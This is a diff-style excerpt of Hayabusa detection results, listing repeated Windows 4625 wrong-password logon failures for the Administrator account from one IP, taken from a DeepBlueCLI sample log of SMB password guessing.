+2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
